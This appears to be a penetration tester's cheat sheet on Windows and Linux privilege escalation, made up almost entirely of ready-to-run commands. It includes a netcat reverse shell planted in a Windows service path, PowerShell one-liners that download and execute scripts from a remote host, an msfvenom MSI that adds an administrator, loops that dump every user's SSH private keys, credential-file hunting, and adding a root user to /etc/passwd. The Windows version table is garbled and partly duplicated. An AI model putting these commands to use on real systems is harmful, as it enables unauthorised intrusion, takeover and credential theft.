Privilege escalation
One of the fun parts!

Windows

Windows versions

Clients

1
Windows OS Version Number
2
3
Windows 1.0 1.04
4
Windows 2.0 2.11
5
Windows 3.0 3
6
Windows NT 3.1 3.10.528
7
Windows for Workgroups 3.11 3.11
8
Windows NT Workstation 3.5 3.5.807
9
Windows NT Workstation 3.51 3.51.1057
10
Windows 95 4.0.950
11
Windows NT Workstation 4.0 4.0.1381
12
Windows 98 4.1.1998
13
Windows 98 Second Edition 4.1.2222
14
Windows Me 4.90.3000
15
Windows 2000 Professional 5.0.2195
16
Windows XP 5.1.2600
17
Windows Vista 6.0.6000
18
Windows 7 6.1.7600
19
Windows 8.1 6.3.9600
20
Windows 10 10.0.10240
Copied!

Servers

1
Windows NT 3.51 NT 3.51
2
Windows NT 3.5 NT 3.50
3
Windows NT 3.1 NT 3.10
4
Windows 2000 NT 5.0
5
6
Windows 2000 Server
7
Windows 2000 Advanced Server
8
Windows 2000 Datacenter Server
9
10
Windows NT 4.0 NT 4.0
11
12
Windows NT 4.0 Server
13
Windows NT 4.0 Server Enterprise
14
Windows NT 4.0 Terminal Server Edition
15
16
Windows Server 2003 NT 5.2
17
18
Windows Small Business Server 2003
19
Windows Server 2003 Web Edition
20
Windows Server 2003 Standard Edition
21
Windows Server 2003 Enterprise Edition
22
Windows Server 2003 Datacenter Edition
23
Windows Storage Server
24
25
Windows Server 2003 R2 NT 5.2
26
27
Windows Small Business Server 2003 R2
28
Windows Server 2003 R2 Web Edition
29
Windows Server 2003 R2 Standard Edition
30
Windows Server 2003 R2 Enterprise Edition
31
Windows Server 2003 R2 Datacenter Edition
32
Windows Compute Cluster Server 2003 (CCS)
33
Windows Storage Server
34
Windows Home Server
35
36
Windows Server 2008 NT 6.0
37
38
Windows Server 2008 Standard
39
Windows Server 2008 Enterprise
40
Windows Server 2008 Datacenter
41
Windows Server 2008 for Itanium-based Systems
42
Windows Server Foundation 2008
43
Windows Essential Business Server 2008
44
Windows HPC Server 2008
45
Windows Small Business Server 2008
46
Windows Storage Server 2008
47
Windows Web Server 2008
48
49
Windows Server 2008 R2 NT 6.1
50
51
Windows Server 2008 R2 Foundation
52
Windows Server 2008 R2 Standard
53
Windows Server 2008 R2 Enterprise
54
Windows Server 2008 R2 Datacenter
55
Windows Server 2008 R2 for Itanium-based Systems
56
Windows Web Server 2008 R2
57
Windows Storage Server 2008 R2
58
Windows HPC Server 2008 R2
59
Windows Small Business Server 2011
60
Windows MultiPoint Server 2011
61
Windows Home Server 2011
62
Windows MultiPoint Server 2010
63
64
Windows Server 2012 NT 6.2
65
66
Windows Server 2012 Foundation
67
Windows Server 2012 Essentials
68
Windows Server 2012 Standard
69
Windows Server 2012 Datacenter
70
Windows MultiPoint Server 2012
71
72
Windows Server 2012 R2 NT 6.3
73
74
Windows Server 2012 R2 Foundation
75
Windows Server 2012 R2 Essentials
76
Windows Server 2012 R2 Standard
77
Windows Server 2012 R2 Datacenter
78
79
Windows Server 2016 2016 NT 10.0Windows NT 3.51 NT 3.51
80
Windows NT 3.5 NT 3.50
81
Windows NT 3.1 NT 3.10
82
Windows 2000 NT 5.0
83
84
Windows 2000 Server
85
Windows 2000 Advanced Server
86
Windows 2000 Datacenter Server
87
88
Windows NT 4.0 NT 4.0
89
90
Windows NT 4.0 Server
91
Windows NT 4.0 Server Enterprise
92
Windows NT 4.0 Terminal Server Edition
93
94
Windows Server 2003 NT 5.2
95
96
Windows Small Business Server 2003
97
Windows Server 2003 Web Edition
98
Windows Server 2003 Standard Edition
99
Windows Server 2003 Enterprise Edition
100
Windows Server 2003 Datacenter Edition
101
Windows Storage Server
102
103
Windows Server 2003 R2 NT 5.2
104
105
Windows Small Business Server 2003 R2
106
Windows Server 2003 R2 Web Edition
107
Windows Server 2003 R2 Standard Edition
108
Windows Server 2003 R2 Enterprise Edition
109
Windows Server 2003 R2 Datacenter Edition
110
Windows Compute Cluster Server 2003 (CCS)
111
Windows Storage Server
112
Windows Home Server
113
114
Windows Server 2008 NT 6.0
115
116
Windows Server 2008 Standard
117
Windows Server 2008 Enterprise
118
Windows Server 2008 Datacenter
119
Windows Server 2008 for Itanium-based Systems
120
Windows Server Foundation 2008
121
Windows Essential Business Server 2008
122
Windows HPC Server 2008
123
Windows Small Business Server 2008
124
Windows Storage Server 2008
125
Windows Web Server 2008
126
127
Windows Server 2008 R2 NT 6.1
128
129
Windows Server 2008 R2 Foundation
130
Windows Server 2008 R2 Standard
131
Windows Server 2008 R2 Enterprise
132
Windows Server 2008 R2 Datacenter
133
Windows Server 2008 R2 for Itanium-based Systems
134
Windows Web Server 2008 R2
135
Windows Storage Server 2008 R2
136
Windows HPC Server 2008 R2
137
Windows Small Business Server 2011
138
Windows MultiPoint Server 2011
139
Windows Home Server 2011
140
Windows MultiPoint Server 2010
141
142
Windows Server 2012 NT 6.2
143
144
Windows Server 2012 Foundation
145
Windows Server 2012 Essentials
146
Windows Server 2012 Standard
147
Windows Server 2012 Datacenter
148
Windows MultiPoint Server 2012
149
150
Windows Server 2012 R2 NT 6.3
151
152
Windows Server 2012 R2 Foundation
153
Windows Server 2012 R2 Essentials
154
Windows Server 2012 R2 Standard
155
Windows Server 2012 R2 Datacenter
156
157
Windows Server 2016 2016 NT 10.0
Copied!

Users

1
whoami
Copied!
1
echo %username%
Copied!
Which user privileges do we have?
1
whoami /priv
Copied!
Which users are there?
1
net users
Copied!
Maybe we are local admin already?
1
net localgroup administrators
Copied!
Credential manager
1
cmdkey /list
Copied!
Currently cached Kerberos tickets (and maybe some info about other network components)
1
klist
Copied!
Are there other logged in users?
1
qwinsta
Copied!

Passwords

Password hashes

1
/usr/share/windows-binaries/fgdump/fgdump.exe
2
C:\> fgdump.exe
3
C:\> type 127.0.0.1.pwdump
Copied!
FGDump - aldeid
If domain controller, search for the "cpassword" within the groups.xml:
1
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
Copied!

Search for passwords

Search for files that contain "password" in the filename:
1
dir /s *password*
Copied!
Search for "password" in files:
1
findstr /si password *.ini *.xml *.txt
2
findstr /spin "password" *.*
Copied!
Some common files:
1
type c:\sysprep.inf
2
type c:\sysprep\sysprep.xml
3
type c:\unattend.xml
4
type %WINDIR%\Panther\Unattend\Unattended.xml
5
type %WINDIR%\Panther\Unattended.xml
6
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
7
8
dir c:*vnc.ini /s /b
9
dir c:*ultravnc.ini /s /b
10
dir c:\ /s /b | findstr /si *vnc.ini
Copied!
Moaaahr files:
1
%windir%\repair\sam
2
%windir%\System32\config\RegBack\SAM
3
%windir%\repair\system
4
%windir%\repair\software
5
%windir%\repair\security
6
%windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account)
7
%windir%\iis6.log (5,6 or 7)
8
%windir%\system32\logfiles\httperr\httperr1.log
9
C:\sysprep.inf
10
C:\sysprep\sysprep.inf
11
C:\sysprep\sysprep.xml
12
%windir%\Panther\Unattended.xml
13
C:\inetpub\wwwroot\Web.config
14
%windir%\system32\config\AppEvent.Evt (Application log)
15
%windir%\system32\config\SecEvent.Evt (Security log)
16
%windir%\system32\config\default.sav
17
%windir%\system32\config\security.sav
18
%windir%\system32\config\software.sav
19
%windir%\system32\config\system.sav
20
%windir%\system32\inetsrv\config\applicationHost.config
21
%windir%\system32\inetsrv\config\schema\ASPNET_schema.xml
22
%windir%\System32\drivers\etc\hosts (dns entries)
23
%windir%\System32\drivers\etc\networks (network settings)
24
%windir%\system32\config\SAM (only really useful if you have access to the files while the machine is off)
Copied!

Unquoted Service Path

1
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Copied!

AlwaysInstallElevated

Check if the following registry settings are set to "1"
1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Copied!
1
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Copied!
If so, create your own malicious MSI that will add a local user
1
msfvenom -p windows/adduser USER=hodor PASS=Qwerty123! -f msi -o hodor.msi
Copied!
And execute
1
msiexec /quiet /qn /i C:\hodor.msi
Copied!

upnp host

1
sc qc upnphost
2
sc config upnphost binpath= "C:\nc.exe -nv x.x.x.x -e C:\WINDOWS\System32\cmd.exe"
3
sc config upnphost obj= ".\LocalSystem" password= ""
4
sc qc upnphost
5
net start upnphost
Copied!
Got an error for a missing dependency?
1
sc config SSDPSRV start= auto
2
net start SSDPSRV
3
net start upnphost
Copied!
Or just remove the dependency:
1
sc config upnphost depend= ""
Copied!

Scheduled tasks

List scheduled tasks
1
schtasks /query /fo LIST /v
Copied!
Running processes linked to services
1
tasklist /SVC
Copied!

PowerShell tools

PowerUp.ps1

Checks for common Windows privesc vectors
PowerTools/PowerUp.ps1 at master · PowerShellEmpire/PowerTools
GitHub
Download at target:
1
IEX(New-Object Net.Webclient).downloadString('http://x.x.x.x:8000/PowerUp.ps1')
Copied!
Add to bottom:
1
Invoke-AllChecks
Copied!
Run:
1
powershell.exe -nop -exec bypass
2
PS C:\> Import-Module .\PowerUp.ps1
3
PS C:\> Invoke-AllChecks
Copied!

Sherlock.ps1

Sherlock/Sherlock.ps1 at master · rasta-mouse/Sherlock
GitHub
Download at target:
1
IEX(New-Object Net.Webclient).downloadString('http://x.x.x.x:8000/Sherlock.ps1')
Copied!
Add to bottom:
1
Find-AllVulns
Copied!
Run:
1
powershell.exe -nop -exec bypass
2
PS C:\> Import-Module .\Sherlock.ps1
3
PS C:\> Find-AllVulns
Copied!

Nishang

GitHub - samratashok/nishang: Nishang - Offensive PowerShell for red team, penetration testing and offensive security.
GitHub

Cross compiling

Compile Windows exploit in Linux
1
i686-w64-mingw32-gcc 18176.c -lws2_32 -o 18176.exe
Copied!
Compile Python script to executable
1
wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile exploit.py
Copied!

Misc

Windows remote exploits

1
ms03-026
2
ms03-039 (1)
3
ms03-039 (2)
4
ms03-049
5
ms04-007
6
ms04-011 - ssl bof
7
ms04-011 - lsasarv.dll
8
ms04-031
9
ms05-017
10
1ms05-039
11
ms06-040 (1)
12
ms06-040 (2)
13
ms06-070
14
ms08-067 (1)
15
ms08-067 (2)
16
ms08-067 (3)
17
ms09-050
Copied!

Windows local exploits

1
ms04-011
2
ms04-019 (1)
3
ms04-019 (2)
4
ms04-019 (3)
5
ms04-020
6
keybd_event
7
ms05-018
8
ms05-055
9
ms06-030
10
ms06-049
11
print spool service
12
ms08-025
13
netdde
14
ms10-015
15
ms10-059
16
ms10-092
17
ms11-080
18
ms14-040
19
ms14-058 (1)
20
ms14-058 (2)
21
ms14-070 (1)
22
ms14-070 (2)
23
ms15-010 (1)
24
ms15-010 (2)
25
ms15-051
26
ms16-014
27
ms16-016
28
ms16-032
Copied!

Precompiled exploits

GitHub - abatchy17/WindowsExploits: Windows exploits, mostly precompiled. Not being updated. Check https://github.com/SecWiki/windows-kernel-exploits instead.
GitHub
http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation
www.bhafsec.com
GitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合
GitHub

Linux

Sudo

1
cat /etc/sudoers
2
sudo -l
Copied!
Becoming a super hero is a fairly straight forward process:
1
root ALL=(ALL) ALL
Copied!
The root user can execute from ALL terminals, acting as ALL (any) users, and run ALL (any) command.
1
john ALL= /sbin/poweroff
Copied!
The user john can from any terminal, run the command power off using john's user password.
1
john ALL = (root) NOPASSWD: /usr/bin/scp
Copied!
The user john can from any terminal, run the command scp as root user without password.
Below a selection of gotmi1k's privesc blog which I use a lot.

Distribution type & kernel version

1
cat /etc/*release*
2
uname -a
3
rpm -q kernel
4
dmesg | grep -i linux
Copied!

Default writeable directory / folder

1
/tmp
2
/dev/shm
Copied!

Search for passwords

Search for password within config.php
1
grep -R 'password' config.php
Copied!
Search at whole system
1
find / -type f -exec grep -H 'password' {} \; 2>/dev/null
2
grep -R -i "password" 2> >(grep -v 'Permission denied' >&2)
Copied!
Moaaar grepping
1
grep -i user [filename]
2
grep -i pass [filename]
3
grep -C 5 "password" [filename]
4
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"
Copied!

Find possible other writeable directory / folder

1
find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;
Copied!

Service(s) running as root user

1
ps aux | grep root
2
ps -ef | grep root
Copied!

Installed applications

1
ls -lah /usr/bin/
2
ls -lah /sbin/
3
dpkg -l
4
rpm -qa
5
ls -lah /var/cache/apt/archivesO
6
ls -lah /var/cache/yum/
Copied!

Scheduled jobs

1
crontab -l
2
ls -la /etc/cron*
3
ls -lah /var/spool/cron
4
ls -la /etc/ | grep cron
5
cat /etc/crontab
6
cat /etc/anacrontab
Copied!

Search for juicy shizzle

Find pattern in file:

1
grep -rnw '/etc/passwd' -e 'root'
Copied!

SSH

Host keys

authorized_keys Contains the signature of the public key of any authorised client(s), in other words specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file lets the server authenticate the user.
id_rsa Contains the private key for the client. This RSA key can be used with SSH protocols 1 or 2.
id_rsa.pub Contains the public key for the client
id_dsa Contains the private key for the client. This (insecure) DSA key only can be used with SSH protocol 2.
id_dsa.pub Contains the public key for the client
known_hosts Contains a list of host signatures for hosts the client has ever connected to.

Search for RSA private keys

1
#!/bin/bash
2
for X in $(cut -f6 -d ':' /etc/passwd |sort |uniq); do
3
if [ -s "${X}/.ssh/id_rsa" ]; then
4
echo "### ${X}: "
5
cat "${X}/.ssh/id_rsa"
6
echo ""
7
fi
8
done
Copied!

Search for DSA private keys

1
#!/bin/bash
2
for X in $(cut -f6 -d ':' /etc/passwd |sort |uniq); do
3
if [ -s "${X}/.ssh/id_dsa" ]; then
4
echo "### ${X}: "
5
cat "${X}/.ssh/id_dsa"
6
echo ""
7
fi
8
done
Copied!

Sticky bit, SGID, SUID, GUID

Sticky bit
1
find / -perm -1000 -type d 2>/dev/null
Copied!
SGID (chmod 2000)
1
find / -perm -g=s -type f 2>/dev/null
Copied!
SUID (chmod 4000)
1
find / -perm -u=s -type f 2>/dev/null
2
find /* -user root -perm -4000 -print 2>/dev/null
Copied!
SUID or GUID
1
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
Copied!

Example SUID exploitation

The following file has the SUID bit set:
1
/usr/bin/nano
Copied!
We can use this to execute nano and then add a new root user to /etc/passwd. The next step is to create a password "hodor" with salt "hodor":
1
perl -e 'print crypt("hodor", "hodor"),"\n"'
Copied!
Add to /etc/passwd using nano:
1
hodor:how7QNOjM.95M:0:0:root:/root:/bin/bash
Copied!
Switch to new user:
1
su hodor
Copied!

Add user to /etc/passwd and root group

1
echo hodor::0:0:root:/root:/bin/bash >> /etc/passwd
Copied!

Enumeration tools

Linux local exploits

1
kernel 2.4.x / 2.6.x (sock_sendpage 1)
2
kernel 2.4 / 2.6 (sock_sendpage 2)
3
kernel < 2.6.22 (ftruncate)
4
kernel < 2.6.34 (cap_sys_admin)
5
kernel 2.6.27 < 2.6.36 (compat)
6
kernel < 2.6.36-rc1 (can bcm)
7
kernel <= 2.6.36-rc8 (rds protocol)
8
kernel < 2.6.36.2 (half nelson)
9
kernel <= 2.6.37 (full nelson)
10
kernel 2.6 (udev)
11
kernel 3.13 (sgid)
12
kernel 3.13.0 < 3.19 (overlayfs 1)
13
kernel 3.14.5 (libfutex)
14
kernel 2.6.39 <= 3.2.2 (mempodipper)
15
*kernel 2.6.28 / 3.0 (alpha-omega)
16
kernel 2.6.22 < 3.9 (Dirty Cow)
17
kernel 3.7.6 (msr)
18
*kernel < 3.8.9 (perf_swevent_init)
19
kernel <= 4.3.3 (overlayfs 2)
20
kernel 4.3.3 (overlayfs 3)
21
kernel 4.4.0 (af_packet)
22
kernel 4.4.x (double-fdput)
23
kernel 4.4.0-21 (netfilter)
24
kernel 4.4.1 (refcount)
Copied!

Precompiled exploits

GitHub - SecWiki/linux-kernel-exploits: linux-kernel-exploits Linux平台提权漏洞集合
GitHub
GitHub - xairy/linux-kernel-exploitation: A collection of links related to Linux kernel security and exploitation
GitHub
Last modified 1yr ago